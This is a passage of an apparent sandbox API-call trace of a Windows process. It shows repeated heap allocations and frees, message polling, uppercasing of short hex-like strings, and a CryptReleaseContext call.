0x2aa9520 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.422] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76ec8 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.422] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.422] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.423] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.423] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.423] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.424] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0086.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.424] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0086.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0086.424] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0086.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.425] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.425] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.426] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0086.426] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0086.426] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.427] FreeLibrary (hLibModule=0x76390000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.427] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.427] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.427] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0086.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0086.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.428] CloseHandle (hObject=0x294) returned 1 [0086.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0086.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0086.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 